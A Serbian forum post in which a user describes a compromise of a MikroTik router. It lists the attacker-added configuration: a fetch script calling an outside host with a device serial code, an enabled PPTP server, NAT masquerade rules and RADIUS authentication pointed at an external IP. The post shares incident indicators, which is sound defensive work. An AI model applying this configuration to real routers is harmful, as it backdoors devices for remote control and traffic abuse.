Dakle ovako:
Ovo isto se desilo i meni u isto vreme, znaci pre 3 dana.
Posto se napad desio u isto vreme, mogu da smatram da je ovo dobro organizovano i da nije slucajno
Za pristup Mikrotiku koristio sam Winbox, u lokalu i sa Interneta.
Posledice su sledece:
Dodat je script:
/tool fetch url=("
http://www.boss-ip.com/Core/Update.ashx\
?key=85454d8bb84998fa&action=upload&sncode=434017A7560235760C99A0FA08D602C5&dynamic=static")}
Nisam zapamtio koliko cesto se aktivirao.
Izmenjeno je ime routera:
set name=test
Dodato je sledece:
add name=pool1 ranges=10.1.1.2-10.1.1.250
/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test \
remote-address=pool1 use-encryption=yes
/interface pptp-server server
set authentication=pap,chap default-profile=test enabled=yes
add action=masquerade chain=srcnat
add action=masquerade chain=srcnat
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
[Ovu poruku je menjao zastava10 dana 18.06.2018. u 16:33 GMT+1]
[Ovu poruku je menjao zastava10 dana 18.06.2018. u 16:37 GMT+1]